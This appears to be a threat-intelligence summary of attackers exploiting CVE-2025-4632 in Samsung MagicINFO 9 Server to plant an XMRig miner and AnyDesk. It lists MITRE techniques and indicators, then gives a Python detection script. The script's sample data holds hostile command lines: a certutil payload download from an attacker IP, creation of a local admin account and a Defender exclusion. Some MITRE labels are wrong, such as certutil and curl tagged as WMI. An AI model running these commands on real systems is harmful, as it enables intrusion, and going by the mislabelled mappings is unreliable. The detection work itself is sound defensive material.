In mid-May 2025, eSentire’s Threat Response Unit detected active exploitation of a critical vulnerability (CVE-2025-4632) in Samsung MagicINFO 9 Server, allowing remote code execution and unauthorized access. The attackers deployed a disguised XMRig cryptominer and abused AnyDesk for persistence and remote control, bypassing security measures through automated scripts and defender exclusions. #CVE20254632 #SamsungMagicINFO #XMRig #AnyDesk
Key points
- Exploitation of CVE-2025-4632 in Samsung MagicINFO 9 Server enabled unauthenticated remote code execution with system privileges.
- Attackers automated commands to create persistence, disable security measures, and deploy the AnyDesk remote management tool for remote control.
- A variant of the XMRig Monero cryptominer was deployed under the name “smi2.exe” using PowerShell and batch scripts with multiple fallback mechanisms.
- The attackers created privileged local user accounts, added Microsoft Defender exclusions, and used legitimate Windows utilities (certutil, curl) for payload delivery.
- XMRig was configured for stealthy mining with multiple mining pool endpoints and autosave enabled, aiming to evade detection and maintain persistence.
- AnyDesk was extensively configured to enable advanced remote access features, supporting ongoing attacker control while bypassing trust-based security.
- eSentire’s 24/7 SOC isolated affected hosts and provided remediation recommendations, emphasizing patching, monitoring, and restricting remote administration tools.
MITRE Techniques
- [T1203] Exploitation for Initial Access – The attackers exploited CVE-2025-4632 in Samsung MagicINFO 9 Server to execute arbitrary commands (“…exploitation of a critical vulnerability…allows unauthenticated attackers to execute arbitrary commands…”).
- [T1136] Create Account – Creation of a privileged local user “samsungmid” with administrator and remote desktop privileges (“User Account Creation: The script created a new local user account “samsungmid” with administrative privileges…”).
- [T1059] Command and Scripting Interpreter – Use of PowerShell and batch scripts to download and execute cryptomining malware and configure persistence (“Utilized both PowerShell and batch scripts…”).
- [T1086] PowerShell – Execution of multi-stage PowerShell commands to disable security and deploy payloads (“The script added Defender exclusions… executed AnyDesk…”).
- [T1112] Modify Registry – Added directories to Microsoft Defender exclusion lists to evade detection (“The attacker added the %TEMP% and %MAGICINFOPREMIUMHOME% directories to Microsoft Defender’s exclusion lists…”).
- [T1047] Windows Management Instrumentation – Use of legitimate Windows utilities like certutil and curl for downloading payloads (“…employed multiple fallback mechanisms, including PowerShell, certutil, and curl…”).
- [T1021] Remote Services – Abuse of AnyDesk remote desktop tool for persistent remote access (“…executed AnyDesk, retrieved the installation ID, and configured a new profile with extensive capabilities…”).
Indicators of Compromise
- [IP Addresses] Attack infrastructure – 157.230.106[.]100, 173.249.48[.]227, 185.213.26[.]27 used for cryptominer payload delivery and mining pools.
- [File Names] Cryptominer and scripts – smi2.exe (XMRig miner), win.ps1 (PowerShell downloader), win.bat (batch downloader and executor).
- [Accounts] Privileged user – Local user account “samsungmid” with administrative and remote desktop privileges created by attacker scripts.
- [Domains] Command and control – crmmr[.]icc[.]me used as alternative download source for malicious scripts and miner payloads.
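The techniques and indicators above translate directly into host-level detection content. The following is an added example (not code from eSentire or the original report) that applies command-line rules for the account creation, Defender exclusion, certutil/curl download, AnyDesk and file-name indicators to constructed process-creation events and flags a host only when several distinct behaviours chain together; the sample command lines and the AnyDesk switches it matches are assumptions, not telemetry from the incident.

```python
import re

# Constructed sample process-creation command lines modelled on the chain in
# this report (not telemetry from the incident); the IP is one the report lists.
SAMPLE_EVENTS = [
    {"host": "magicinfo-01", "cmd": "cmd.exe /c net user samsungmid /add"},
    {"host": "magicinfo-01", "cmd": "net localgroup administrators samsungmid /add"},
    {"host": "magicinfo-01", "cmd": 'powershell -nop -w hidden Add-MpPreference -ExclusionPath "%TEMP%"'},
    {"host": "magicinfo-01", "cmd": "certutil -urlcache -split -f http://157.230.106[.]100/win.ps1 %TEMP%\\win.ps1"},
    {"host": "magicinfo-01", "cmd": "%TEMP%\\smi2.exe --background"},
    {"host": "magicinfo-01", "cmd": "C:\\Temp\\AnyDesk.exe --get-id"},
    {"host": "fileserver-02", "cmd": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

# Each rule: a short name (tagged with the report's MITRE mapping where one
# applies) and a case-insensitive pattern over the raw command line.
RULES = [
    ("T1136 local account creation", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("T1136 local admin group addition", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s.*\s/add\b", re.I)),
    ("T1112 Defender exclusion added", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("certutil/curl payload download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache|\bcurl(\.exe)?\b.*\s-[oO]\s", re.I)),
    ("T1021 AnyDesk remote access", re.compile(r"\banydesk(\.exe)?\s.*--(get-id|set-password|install)\b", re.I)),
    ("IoC file name", re.compile(r"\b(smi2\.exe|win\.ps1|win\.bat)\b", re.I)),
    ("IoC account name", re.compile(r"\bsamsungmid\b", re.I)),
]


def match_event(event):
    """Return the names of all rules whose pattern hits this command line."""
    return [name for name, pat in RULES if pat.search(event["cmd"])]


def score_hosts(events, threshold=3):
    """Collect distinct rule hits per host and return hosts at or above the
    threshold. Requiring several distinct behaviours on one host separates
    the chained post-exploitation sequence from a lone admin running net user."""
    hits = {}
    for ev in events:
        for name in match_event(ev):
            hits.setdefault(ev["host"], set()).add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= threshold}


if __name__ == "__main__":
    for host, names in score_hosts(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(names))
```

Feeding real Sysmon Event ID 1 or Security 4688 command lines into `score_hosts` is the intended use; the threshold keeps a single legitimate `net user` from paging the SOC.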
Read more: https://www.esentire.com/blog/when-samsungs-magic-turns-tragic-a-tale-of-unauthorized-mining